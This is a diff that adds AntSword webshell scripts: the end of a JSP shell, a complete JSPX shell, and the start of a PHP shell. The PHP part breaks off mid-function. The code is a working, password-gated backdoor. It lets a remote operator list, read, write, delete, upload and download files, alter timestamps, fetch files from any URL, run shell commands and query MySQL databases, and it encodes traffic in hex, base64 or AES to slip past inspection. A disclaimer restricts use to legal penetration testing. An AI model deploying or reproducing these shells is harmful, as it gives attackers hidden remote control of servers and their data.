    String getKeyFromCookie(Cookie[] cookies){
        String key = "";
        StringBuilder result = new StringBuilder();
        if( cookies != null ){
            for (Cookie c : cookies) {
                if (c.getName().equals(SessionKey)) {
                    key = c.getValue();
                    break;
                }
            }
        }
        if(key.length() < aes_keylen){
            for(int i=0;key.length() < aes_keylen;i++){
                key += aes_key_padding;
            }
        }if(key.length() > aes_keylen){
            key = key.substring(0,aes_keylen);
        }
        return key;
    }
    void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
        while ((l = br.readLine()) != null) {
            sb.append(l + "\r\n");
        }
        br.close();
    }%>
 <%
    response.setContentType("text/html");
    request.setCharacterEncoding(cs);
    response.setCharacterEncoding(cs);
    StringBuffer output = new StringBuffer("");
    StringBuffer sb = new StringBuffer("");
    Cookie cookie = new Cookie(SessionKey, session.getId());
    response.addCookie(cookie);
    try {
        AesKey = getKeyFromCookie(request.getCookies());
        String funccode = EC(request.getParameter(Pwd) + "");
        String z0 = EC(decode(request.getParameter("z0")+"", encoder));
        String z1 = EC(decode(request.getParameter("z1")+"", encoder));
        String z2 = EC(decode(request.getParameter("z2")+"", encoder));
        String z3 = EC(decode(request.getParameter("z3")+"", encoder));
        String[] pars = { z0, z1, z2, z3};
        output.append(decode(RetS,"base64"));
        if (funccode.equals("B")) {
            sb.append(FileTreeCode(pars[1]));
        } else if (funccode.equals("C")) {
            sb.append(ReadFileCode(pars[1]));
        } else if (funccode.equals("D")) {
            sb.append(WriteFileCode(pars[1], pars[2]));
        } else if (funccode.equals("E")) {
            sb.append(DeleteFileOrDirCode(pars[1]));
        } else if (funccode.equals("F")) {
            DownloadFileCode(pars[1], response);
        } else if (funccode.equals("U")) {
            sb.append(UploadFileCode(pars[1], pars[2]));
        } else if (funccode.equals("H")) {
            sb.append(CopyFileOrDirCode(pars[1], pars[2]));
        } else if (funccode.equals("I")) {
            sb.append(RenameFileOrDirCode(pars[1], pars[2]));
        } else if (funccode.equals("J")) {
            sb.append(CreateDirCode(pars[1]));
        } else if (funccode.equals("K")) {
            sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
        } else if (funccode.equals("L")) {
            sb.append(WgetCode(pars[1], pars[2]));
        } else if (funccode.equals("M")) {
            sb.append(ExecuteCommandCode(pars[1], pars[2]));
        } else if (funccode.equals("N")) {
            sb.append(showDatabases(pars[0], pars[1]));
        } else if (funccode.equals("O")) {
            sb.append(showTables(pars[0], pars[1], pars[2]));
        } else if (funccode.equals("P")) {
            sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
        } else if (funccode.equals("Q")) {
            sb.append(query(pars[0], pars[1], pars[2]));
        } else if (funccode.equals("A")) {
            sb.append(SysInfoCode(request));
        }else{
            sb.append(Version);
        }
    } catch (Exception e) {
        sb.append("ERROR" + ":// " + e.toString());
    }
    try {
        output.append(asenc(sb.toString(), decoder));
    }catch (Exception e) {
        sb.append("ERROR" + ":// " + e.toString());
    }
    output.append(decode(RetE, "base64"));
    out.print(output.toString());
 %>
--- a/antSword-shells/jspx_custom_script_for_mysql.jspx
+++ b/antSword-shells/jspx_custom_script_for_mysql.jspx
@@ -0,0 +1,570 @@
 <!--
             _   ____                       _
  __ _ _ __ | |_/ ___|_      _____  _ __ __| |
 / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
 | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
 \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
 ———————————————————————————————————————————————
    AntSword JSPX Custom Script for Mysql
    警告：
        此脚本仅供合法的渗透测试以及爱好者参考学习
         请勿用于非法用途，否则将追究其相关责任！
 ———————————————————————————————————————————————
 说明：
 1. AntSword >= v2.1.0
 2. 创建 Shell 时选择 custom 模式连接
 3. 数据库连接：
    com.mysql.jdbc.Driver
    jdbc:mysql://localhost/test?user=root&password=123456
    注意：以上是两行
 4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致，如果选择 default 则需要将值设置为空
 ChangeLog:
  v1.8
    1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
  v1.7
    1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
    2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
  v1.6
    1. 新增 4 种解码器支持
  v1.5
    1. 修正 base64 编码器下连接数据库 characterEncoding 出错
  v1.4
    1. 修正 windows 下基础路径获取盘符会出现小写的情况
  v1.3
   1. 修正上传文件超过1M时的bug
   2. 修正weblogic war 包布署获取路径问题
   3. 修正文件中文字符问题
  Date: 2016/04/29 v1.2
   1. 修正修改包含结束tag的文件会出错的 bug
  Date: 2016/04/06 v1.1
   1. 修正下载文件参数设置错误
   2. 修正一些注释的细节
  Date: 2016/03/26 v1
   1. 文件系统 和 terminal 管理
   2. mysql 数据库支持
   3. 支持 base64 和 hex 编码
 -->
 <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
    <jsp:directive.page import="java.io.*"/>
    <jsp:directive.page import="java.util.*"/>
    <jsp:directive.page import="java.net.*"/>
    <jsp:directive.page import="java.sql.*"/>
    <jsp:directive.page import="java.text.*"/>
    <jsp:directive.page import="javax.crypto.*"/>
    <jsp:directive.page import="java.security.*"/>
    <jsp:directive.page import="javax.crypto.spec.*"/>
    <jsp:declaration>
    <![CDATA[
        // ################################################
        String Pwd = "ant";   //连接密码
        // 编码器 3 选 1
        String encoder = "";       // default
        // String encoder = "base64"; //base64
        // String encoder = "hex";    //hex(推荐)
        // String encoder = "aes";         // aes(加密方式见下文aes配置)
        String cs = "UTF-8"; // 字符编码
        // 解码器 4 选 1
        String decoder = "";
        // String decoder = "base64"; // base64 中文正常
        // String decoder = "hex"; // hex 中文可能有问题
        // String decoder = "hex_base64"; // hex(base64) // 中文正常
        // String decoder = "aes_base64";  // aes(base64) (加密方式见下文aes配置)
        // 其它配置
        String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
        String RetS = "LT58";               // 数据起始分割符 base64
        String RetE = "fDwt";               // 数据结束分割符 base64
        // aes 加密配置项
        /*
        *  aes-128-cfb_zero_padding:
        *   - aes_mode: CFB
        *   - aes_padding: NoPadding
        *   - aes_keylen: 16
        *  aes-256-ecb_zero_padding:
        *   - aes_mode: ECB
        *   - aes_padding: NoPadding
        *   - aes_keylen: 32
        */
        // 注意: 以下4项为 encoder/decoder 共用
        // 如果需要请求和返回采用不同方式, 自行修改
        String aes_mode = "CFB";            // CBC|ECB|CFB|
        String aes_padding = "NoPadding";   // NoPadding|PKCS5Padding|PKCS7Padding
        int aes_keylen = 16;                // 16|32  // 16(AES-128) 32(AES-256)
        String aes_key_padding = "a";       // 获取到的 key 位数不够时填充字符
    // ################################################################
        String AesKey = "";
        String Version = "1.7";
        String EC(String s) throws Exception {
            if(encoder.equals("hex") || encoder == "hex") return s;
            return new String(s.getBytes(), cs);
        }
        String showDatabases(String encode, String conn) throws Exception {
            String sql = "show databases";
            String columnsep = "\t";
            String rowsep = "";
            return executeSQL(encode, conn, sql, columnsep, rowsep, false);
        }
        String showTables(String encode, String conn, String dbname) throws Exception {
            String sql = "show tables from " + dbname;
            String columnsep = "\t";
            String rowsep = "";
            return executeSQL(encode, conn, sql, columnsep, rowsep, false);
        }
        String showColumns(String encode, String conn, String dbname, String table) throws Exception {
            String columnsep = "\t";
            String rowsep = "";
            String sql = "select * from " + dbname + "." + table + " limit 0,0";
            return executeSQL(encode, conn, sql, columnsep, rowsep, true);
        }
        String query(String encode, String conn, String sql) throws Exception {
            String columnsep = "\t|\t";
            String rowsep = "\r\n";
            return executeSQL(encode, conn, sql, columnsep, rowsep, true);
        }
        String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
                throws Exception {
            String ret = "";
            conn = (EC(conn));
            String[] x = conn.trim().replace("\r\n", "\n").split("\n");
            Class.forName(x[0].trim());
            String url = x[1] + "&characterEncoding=" + decode(EC(encode),encoder);
            Connection c = DriverManager.getConnection(url);
            Statement stmt = c.createStatement();
            ResultSet rs = stmt.executeQuery(sql);
            ResultSetMetaData rsmd = rs.getMetaData();
            if (needcoluname) {
                for (int i = 1; i <= rsmd.getColumnCount(); i++) {
                    String columnName = rsmd.getColumnName(i);
                    ret += columnName + columnsep;
                }
                ret += rowsep;
            }
            while (rs.next()) {
                for (int i = 1; i <= rsmd.getColumnCount(); i++) {
                    String columnValue = rs.getString(i);
                    ret += columnValue + columnsep;
                }
                ret += rowsep;
            }
            return ret;
        }
        String WwwRootPathCode(String d) throws Exception {
            String s = "";
            if (!d.substring(0, 1).equals("/")) {
                File[] roots = File.listRoots();
                for (int i = 0; i < roots.length; i++) {
                    s += roots[i].toString().substring(0, 2) + "";
                }
            } else {
                s += "/";
            }
            return s;
        }
        String FileTreeCode(String dirPath) throws Exception {
            File oF = new File(dirPath), l[] = oF.listFiles();
            String s = "", sT, sQ, sF = "";
            java.util.Date dt;
            String fileCode=(String)System.getProperties().get("file.encoding");
            SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
            for (int i = 0; i < l.length; i++) {
                dt = new java.util.Date(l[i].lastModified());
                sT = fm.format(dt);
                sQ = l[i].canRead() ? "R" : "";
                sQ += l[i].canWrite() ? " W" : "";
                String nm = new String(l[i].getName().getBytes(fileCode), cs);
                if (l[i].isDirectory()) {
                    s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
                } else {
                    sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
                }
            }
            s += sF;
            return new String(s.getBytes(fileCode), cs);
        }
        String ReadFileCode(String filePath) throws Exception {
            String l = "", s = "";
            BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
            while ((l = br.readLine()) != null) {
                s += l + "\r\n";
            }
            br.close();
            return s;
        }
        String WriteFileCode(String filePath, String fileContext) throws Exception {
            String h = "0123456789ABCDEF";
            String fileHexContext = strtohexstr(fileContext);
            File f = new File(filePath);
            FileOutputStream os = new FileOutputStream(f);
            for (int i = 0; i < fileHexContext.length(); i += 2) {
                os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
            }
            os.close();
            return "1";
        }
        String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
            File f = new File(fileOrDirPath);
            if (f.isDirectory()) {
                File x[] = f.listFiles();
                for (int k = 0; k < x.length; k++) {
                    if (!x[k].delete()) {
                        DeleteFileOrDirCode(x[k].getPath());
                    }
                }
            }
            f.delete();
            return "1";
        }
        void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
            int n;
            byte[] b = new byte[512];
            r.reset();
            ServletOutputStream os = r.getOutputStream();
            BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
            os.write(("->"+"|").getBytes(), 0, 3);
            while ((n = is.read(b, 0, 512)) != -1) {
                os.write(b, 0, n);
            }
            os.write(("|"+"<-").getBytes(), 0, 3);
            os.close();
            is.close();
        }
        String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
            String h = "0123456789ABCDEF";
            File f = new File(savefilePath);
            f.createNewFile();
            FileOutputStream os = new FileOutputStream(f,true);
            for (int i = 0; i < fileHexContext.length(); i += 2) {
                os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
            }
            os.close();
            return "1";
        }
        String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
            File sf = new File(sourceFilePath), df = new File(targetFilePath);
            if (sf.isDirectory()) {
                if (!df.exists()) {
                    df.mkdir();
                }
                File z[] = sf.listFiles();
                for (int j = 0; j < z.length; j++) {
                    CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
                }
            } else {
                FileInputStream is = new FileInputStream(sf);
                FileOutputStream os = new FileOutputStream(df);
                int n;
                byte[] b = new byte[1024];
                while ((n = is.read(b, 0, 1024)) != -1) {
                    os.write(b, 0, n);
                }
                is.close();
                os.close();
            }
            return "1";
        }
        String RenameFileOrDirCode(String oldName, String newName) throws Exception {
            File sf = new File(oldName), df = new File(newName);
            sf.renameTo(df);
            return "1";
        }
        String CreateDirCode(String dirPath) throws Exception {
            File f = new File(dirPath);
            f.mkdir();
            return "1";
        }
        String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
            File f = new File(fileOrDirPath);
            SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
            java.util.Date dt = fm.parse(aTime);
            f.setLastModified(dt.getTime());
            return "1";
        }
        String WgetCode(String urlPath, String saveFilePath) throws Exception {
            URL u = new URL(urlPath);
            int n = 0;
            FileOutputStream os = new FileOutputStream(saveFilePath);
            HttpURLConnection h = (HttpURLConnection) u.openConnection();
            InputStream is = h.getInputStream();
            byte[] b = new byte[512];
            while ((n = is.read(b)) != -1) {
                os.write(b, 0, n);
            }
            os.close();
            is.close();
            h.disconnect();
            return "1";
        }
        String SysInfoCode(HttpServletRequest r) throws Exception {
            String d = "";
            try {
                if(r.getSession().getServletContext().getRealPath("/") != null){
                    d = r.getSession().getServletContext().getRealPath("/");
                }else{
                    String cd = this.getClass().getResource("/").getPath();
                    d = new File(cd).getParent();
                }
            } catch (Exception e) {
                String cd = this.getClass().getResource("/").getPath();
                d = new File(cd).getParent();
            }
            d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
            String serverInfo = (String)System.getProperty("os.name");
            String separator = File.separator;
            String user = (String)System.getProperty("user.name");
            String driverlist = WwwRootPathCode(d);
            return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
        }
        boolean isWin() {
            String osname = (String)System.getProperty("os.name");
            osname = osname.toLowerCase();
            if (osname.startsWith("win"))
                return true;
            return false;
        }
        String ExecuteCommandCode(String cmdPath, String command) throws Exception {
            StringBuffer sb = new StringBuffer("");
            String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
            Process p = Runtime.getRuntime().exec(c);
            CopyInputStream(p.getInputStream(), sb);
            CopyInputStream(p.getErrorStream(), sb);
            return sb.toString();
        }
        String getEncoding(String str) {
            String encode[] = new String[]{
                    "UTF-8",
                    "ISO-8859-1",
                    "GB2312",
                    "GBK",
                    "GB18030",
                    "Big5",
                    "Unicode",
                    "ASCII"
            };
            for (int i = 0; i < encode.length; i++){
                try {
                    if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
                        return encode[i];
                    }
                } catch (Exception ex) {
                }
            }
            return "";
        }
        String strtohexstr(String fileContext)throws Exception{
            String h = "0123456789ABCDEF";
            byte[] bytes = fileContext.getBytes(cs);
            StringBuilder sb = new StringBuilder(bytes.length * 2);
            for (int i = 0; i < bytes.length; i++) {
                sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
                sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
            }
            String fileHexContext = sb.toString();
            return fileHexContext;
        }
        String asenc(String str, String decode){
            if(decode.equals("hex") || decode=="hex"){
                return strtohexstr(str);
            }else if(decode.equals("base64") || decode == "base64"){
                String sb = "";
                sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
                sb = encoder.encode(str.getBytes());
                return sb;
            }else if(decode.equals("hex_base64") || decode == "hex_base64"){
                return asenc(asenc(str, "base64"), "hex");
            }else if(decode.equals("aes_base64") || decode == "aes_base64"){
                String sb1 = "";
                sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
                return sb1.replace("\r\n","");
            }
            return str;
        }
        String decode(String str) {
            byte[] bt = null;
            try {
                sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
                bt = decoder.decodeBuffer(str);
            } catch (IOException e) {
                e.printStackTrace();
            }
            return new String(bt);
        }
        String decode(String str, String encode) throws Exception{
            if(encode.equals("hex") || encode=="hex"){
                if(str=="null"||str.equals("null")){
                    return "";
                }
                String hexString = "0123456789ABCDEF";
                str = str.toUpperCase();
                ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
                String ss = "";
                for (int i = 0; i < str.length(); i += 2){
                    ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
                    baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
                }
                return baos.toString(cs);
            }else if(encode.equals("base64") || encode == "base64"){
                byte[] bt = null;
                sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
                bt = decoder.decodeBuffer(str);
                return new String(bt,cs);
            }else if(encode.equals("aes") || encode == "aes") {
                String str1 = AesDecrypt(AesKey, str);
                return str1.trim();
            }
            return str;
        }
        String AesEncrypt(String key, String cleartext) throws Exception {
            IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
            SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
            Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
            cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);  
            byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
            sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
            String sb = encoder.encode(encryptedData);
            return sb;
        }
        String AesDecrypt(String key ,String encrypted) throws Exception {
            sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
            byte[] byteMi = decoder.decodeBuffer(encrypted);
            IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
            SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
            cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
            byte[] decryptedData = cipher.doFinal(byteMi);
            return new String(decryptedData, "UTF-8");
        }
        String getKeyFromCookie(Cookie[] cookies){
            String key = "";
            StringBuilder result = new StringBuilder();
            if( cookies != null ){
                for (Cookie c : cookies) {
                    if (c.getName().equals(SessionKey)) {
                        key = c.getValue();
                        break;
                    }
                }
            }
            if(key.length() < aes_keylen){
                for(int i=0;key.length() < aes_keylen;i++){
                    key += aes_key_padding;
                }
            }if(key.length() > aes_keylen){
                key = key.substring(0,aes_keylen);
            }
            return key;
        }
        void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
            String l;
            BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
            while ((l = br.readLine()) != null) {
                sb.append(l + "\r\n");
            }
            br.close();
        }
    ]]>
    </jsp:declaration>
    <jsp:scriptlet>
    <![CDATA[
        response.setContentType("text/html");
        request.setCharacterEncoding(cs);
        response.setCharacterEncoding(cs);
        StringBuffer output = new StringBuffer("");
        StringBuffer sb = new StringBuffer("");
        Cookie cookie = new Cookie(SessionKey, session.getId());
        response.addCookie(cookie);
        try {
            AesKey = getKeyFromCookie(request.getCookies());
            String funccode = EC(request.getParameter(Pwd) + "");
            String z0 = EC(decode(request.getParameter("z0")+"", encoder));
            String z1 = EC(decode(request.getParameter("z1")+"", encoder));
            String z2 = EC(decode(request.getParameter("z2")+"", encoder));
            String z3 = EC(decode(request.getParameter("z3")+"", encoder));
            String[] pars = { z0, z1, z2, z3};
            output.append(decode(RetS,"base64"));
            if (funccode.equals("B")) {
                sb.append(FileTreeCode(pars[1]));
            } else if (funccode.equals("C")) {
                sb.append(ReadFileCode(pars[1]));
            } else if (funccode.equals("D")) {
                sb.append(WriteFileCode(pars[1], pars[2]));
            } else if (funccode.equals("E")) {
                sb.append(DeleteFileOrDirCode(pars[1]));
            } else if (funccode.equals("F")) {
                DownloadFileCode(pars[1], response);
            } else if (funccode.equals("U")) {
                sb.append(UploadFileCode(pars[1], pars[2]));
            } else if (funccode.equals("H")) {
                sb.append(CopyFileOrDirCode(pars[1], pars[2]));
            } else if (funccode.equals("I")) {
                sb.append(RenameFileOrDirCode(pars[1], pars[2]));
            } else if (funccode.equals("J")) {
                sb.append(CreateDirCode(pars[1]));
            } else if (funccode.equals("K")) {
                sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
            } else if (funccode.equals("L")) {
                sb.append(WgetCode(pars[1], pars[2]));
            } else if (funccode.equals("M")) {
                sb.append(ExecuteCommandCode(pars[1], pars[2]));
            } else if (funccode.equals("N")) {
                sb.append(showDatabases(pars[0], pars[1]));
            } else if (funccode.equals("O")) {
                sb.append(showTables(pars[0], pars[1], pars[2]));
            } else if (funccode.equals("P")) {
                sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
            } else if (funccode.equals("Q")) {
                sb.append(query(pars[0], pars[1], pars[2]));
            } else if (funccode.equals("A")) {
                sb.append(SysInfoCode(request));
            }else{
                sb.append(Version);
            }
        } catch (Exception e) {
            sb.append("ERROR" + "://" + e.toString());
        }
        try {
            output.append(asenc(sb.toString(), decoder));
        }catch (Exception e) {
            sb.append("ERROR" + ":// " + e.toString());
        }
        output.append(decode(RetE, "base64"));
        out.print(output.toString());
    ]]>
    </jsp:scriptlet>
 </jsp:root>
--- a/antSword-shells/php_custom_script_for_mysql_fix.php
+++ b/antSword-shells/php_custom_script_for_mysql_fix.php
@@ -0,0 +1,461 @@
 <?php
 /**
 *              _   ____                       _
 *   __ _ _ __ | |_/ ___|_      _____  _ __ __| |
 *  / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
 * | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
 *  \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
 * ———————————————————————————————————————————————
 *     AntSword PHP Custom Script for Mysql
 * 
 *     警告：
 *         此脚本仅供合法的渗透测试以及爱好者参考学习
 *          请勿用于非法用途，否则将追究其相关责任！
 * ———————————————————————————————————————————————
 *
 * 使用说明：
 *  1. AntSword >= v2.0.7
 *  2. 创建 Shell 时选择 custom 模式连接
 *  3. 数据库连接：
 *    <H>localhost</H>
 *    <U>root</U>
 *    <P>123456</P>
 *
 *  4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
 *
 * ChangeLog:
 *   Date: 2020/03/26 v1.4
 *    1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
 *    2. 增加动态修改字符编码接口
 *
 *   Date: 2019/05/22 v1.3
 *    1. 支持 mysqli 连接非默认端口
 *
 *   Date: 2019/04/05 v1.2
 *    1. 新增 listcmd 接口
 *    2. 新增数据库支持函数检查接口
 *
 *   Date: 2016/05/13 v1.1
 *    1. 执行 DML 语句，显示执行状态
 *
 *   Date: 2016/04/06 v1.0
 *    1. 文件系统 和 terminal 管理
 *    2. mysql 数据库支持
 *    3. 支持 base64 和 hex 编码
 **/
 $pwd = "ant"; //连接密码
 //数据编码 3 选 1
 $encoder = ""; // default
 // $encoder = "base64"; //base64
 // $encoder = "hex"; // hex
 //$cs = "UTF-8";
 $cs=isset($_REQUEST['charset'])?$_REQUEST['charset']:"UTF-8";
 /**
 * 字符编码处理
 **/
 function EC($s){
    global $cs;
    $sencode = mb_detect_encoding($s, array("ASCII","UTF-8","GB2312","GBK",'BIG5')); 
    $ret = "";
    try {
        $ret = mb_convert_encoding($s, $cs, $sencode);
    } catch (Exception $e) {
        try {
            $ret = iconv($sencode, $cs, $s);    
        } catch (Exception $e) {
            $ret = $s;
        }
    }
    return $ret;
 }
 /*传输解码*/
 function decode($s){
    global $encoder;
    $ret = "";
    switch ($encoder) {
        case 'base64':
            $ret = base64_decode($s);
            break;
        case 'hex':
            for ($i=0; $i < strlen($s)-1; $i+=2) { 
                $output = substr($s, $i, 2);
                $decimal = intval($output, 16);
                $ret .= chr($decimal);
            }
            break;
        default:
            $ret = $s;
            break;
    }
    return $ret;
 }
 function showDatabases($encode, $conf){
    $sql = "show databases";
    $columnsep = "\t";
    $rowsep = "";
    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
 }
 function showTables($encode, $conf, $dbname){
    $sql = "show tables from ".$dbname; // mysql
    $columnsep = "\t";
    $rowsep = "";
    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
 }
 function showColumns($encode, $conf, $dbname, $table){
    $columnsep = "\t";
    $rowsep = "";
    $sql = "select * from ".$dbname.".".$table." limit 0,0"; // mysql
    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
 }
 function query($encode, $conf, $sql){
    $columnsep = "\t|\t"; // general
    $rowsep = "\r\n";
    return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
 }
 function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){
    $ret = "";
    $m=get_magic_quotes_gpc();
    if ($m) {
        $conf = stripslashes($conf);
    }
    $conf = (EC($conf));
    /*
    <H>localhost</H>
    <U>root</U>
    <P>root</P>
    */
    $host="";
    $user="";
    $password="";
    if (preg_match('/<H>(.+?)<\/H>/i', $conf, $data)) {
        $host = $data[1];    
    }
    if (preg_match('/<U>(.+?)<\/U>/i', $conf, $data)) {
        $user = $data[1];    
    }
    if (preg_match('/<P>(.+?)<\/P>/i', $conf, $data)) {
        $password = $data[1];    
    }
    $encode = decode(EC($encode));
    $port=split(":",$host)[1];
    $host=split(":",$host)[0];
    $conn = @mysqli_connect($host, $user, $password, "", $port);
    $res = @mysqli_query($conn, $sql);
    if (is_bool($res)) {
        return "Status".$columnsep.$rowsep.($res?"True":"False").$columnsep.$rowsep;
    }
    $i=0;
    if ($needcoluname) {
        while ($col=@mysqli_fetch_field($res)) {
            $ret .= $col->name.$columnsep;
            $i++;
        }
        $ret .= $rowsep;
    }
    while($rs=@mysqli_fetch_row($res)){
        for($c = 0; $c <= $i; $c++){
            $ret .= trim($rs[$c]).$columnsep;
        }
        $ret.=$rowsep;
    }
    return $ret;
 }
 function BaseInfo(){
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D==""){
        $D=dirname($_SERVER["PATH_TRANSLATED"]);
    }
    $R="{$D}\t";
    if(substr($D,0,1)!="/"){
        foreach(range("C","Z")as $L)
            if(is_dir("{$L}:"))
                $R.="{$L}:";
    }else{
        $R.="/";
    }
    $R.="\t";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="\t{$s}";
    return $R;
 }
 function FileTreeCode($D){
    $ret = "";
    $F=@opendir($D);
    if($F==NULL){
        $ret = "ERROR:// Path Not Found Or No Permission!";
    }else{
        $M=NULL;
        $L=NULL;
        while($N=@readdir($F)){
            $P=$D."/".$N;
            $T=@date("Y-m-d H:i:s",@filemtime($P));
            @$E=substr(base_convert(@fileperms($P),10,8),-4);
            $R="\t".$T."\t".@filesize($P)."\t".$E."\n";
            if(@is_dir($P))
                $M.=$N."/".$R;
            else
                $L.=$N.$R;
        }
        $ret .= $M.$L;
        @closedir($F);
    }
    return $ret;
 }
 function ReadFileCode($F){
    $ret = "";
    try {
        $P = @fopen($F,"r");
        $ret = (@fread($P,filesize($F)));
        @fclose($P);
    } catch (Exception $e) {
        $ret = "ERROR://".$e;
    }
    return $ret;
 }
 function WriteFileCode($path, $content){
    return @fwrite(fopen(($path),"w"),($content))?"1":"0";
 }
 function DeleteFileOrDirCode($fileOrDirPath){
    function df($p){
        $m=@dir($p);
        while(@$f=$m->read()){
            $pf=$p."/".$f;
            if((is_dir($pf))&&($f!=".")&&($f!="..")){
                @chmod($pf,0777);
                df($pf);
            }
            if(is_file($pf)){
                @chmod($pf,0777);
                @unlink($pf);
            }
        }
        $m->close();
        @chmod($p,0777);
        return @rmdir($p);
    }
    $F=(get_magic_quotes_gpc()?stripslashes($fileOrDirPath):$fileOrDirPath);
    if(is_dir($F)){
        return (df($F));
    }
    else{
        return (file_exists($F)?@unlink($F)?"1":"0":"0");
    }
 }
 function DownloadFileCode($filePath){
    $F=(get_magic_quotes_gpc()?stripslashes($filePath):$filePath);
    $fp=@fopen($F,"r");
    if(@fgetc($fp)){
        @fclose($fp);
        @readfile($F);
    }else{
        echo("ERROR:// Can Not Read");
    }
 }
 function UploadFileCode($path, $content){
    $f=$path;
    $c=$content;
    $c=str_replace("\r","",$c);
    $c=str_replace("\n","",$c);
    $buf="";
    for($i=0;$i<strlen($c);$i+=2)
        $buf.=urldecode("%".substr($c,$i,2));
    return (@fwrite(fopen($f,"a"),$buf)?"1":"0");
 }
 function CopyFileOrDirCode($path, $content){
    $m=get_magic_quotes_gpc();
    $fc=($m?stripslashes($path):$path);
    $fp=($m?stripslashes($content):$content);
    function xcopy($src,$dest){
        if(is_file($src)){
            if(!copy($src,$dest))
                return false;
            else
                return true;
        }
        $m=@dir($src);
        if(!is_dir($dest))
            if(!@mkdir($dest))
                return false;
        while($f=$m->read()){
            $isrc=$src.chr(47).$f;
            $idest=$dest.chr(47).$f;
            if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){
                if(!xcopy($isrc,$idest))return false;
            }else if(is_file($isrc)){
                if(!copy($isrc,$idest))
                    return false;
            }
        }
        return true;
    }
    return (xcopy($fc,$fp)?"1":"0");
 }
 function RenameFileOrDirCode($oldName, $newName){
    $m=get_magic_quotes_gpc();
    $src=(m?stripslashes($oldName):$oldName);
    $dst=(m?stripslashes($newName):$newName);
    return (rename($src,$dst)?"1":"0");
 }
 function CreateDirCode($name){
    $m=get_magic_quotes_gpc();
    $f=($m?stripslashes($name):$name);
    return (mkdir($f)?"1":"0");
 }
 function ModifyFileOrDirTimeCode($fileOrDirPath, $newTime){
    $m=get_magic_quotes_gpc();
